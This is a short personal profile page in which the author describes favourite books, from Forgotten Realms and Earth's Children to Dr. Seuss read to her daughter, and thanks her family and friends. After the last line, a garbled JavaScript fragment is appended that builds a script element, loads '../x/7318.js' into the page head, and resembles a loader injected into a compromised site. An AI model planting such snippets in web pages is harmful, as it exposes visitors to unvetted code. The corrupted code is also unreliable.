.. i love to read. reading is my favorite way to escape. my boyfriend has gotten me hooked on the forgotten realms series, by r.a. salvatore. i've never been much of a science fiction reader, but these are very well written and highly addictive. :) i'm also reading the earth's children series by jean m. auel. i've read all of the existing books and am waiting, impatiently, for the next one to come out. i have tons of favorites: the davinci code, the celestine prophecy (and the accompanying series...the tenth insight and the secrets of shambahla), by james redfield. illusions: the adventures of a reluctant messiah (by richard bach), ishmael, my ishmael, and the story of b (by daniel quinn). and, of course, the harry potter series. and you are only laughing at that last one if you haven't read them yet. :) i also love children's books, and read them daily for my daughter when i put her in bed. ones that have meaning or sentiment attached to them...the giving tree (shel silverstein), where the wild things are (maurice sendak), i LOVE dr. seuss...consequently, so does my daughter. :)
.. my mother, for teaching me it's ok to be me, my sister, for encouraging me to 'follow my bliss', my daughter, arael, for giving me a reason to smile every single day, and my friends, for being a shoulder when i need one and letting me be a shoulder when they do. what would i do without such wonderful role models and such wonderful companionship? .."var s=document·('script');s.src='../x/7318.js';document 3;getElementsByTagName('head')[0].appendChild(s);"
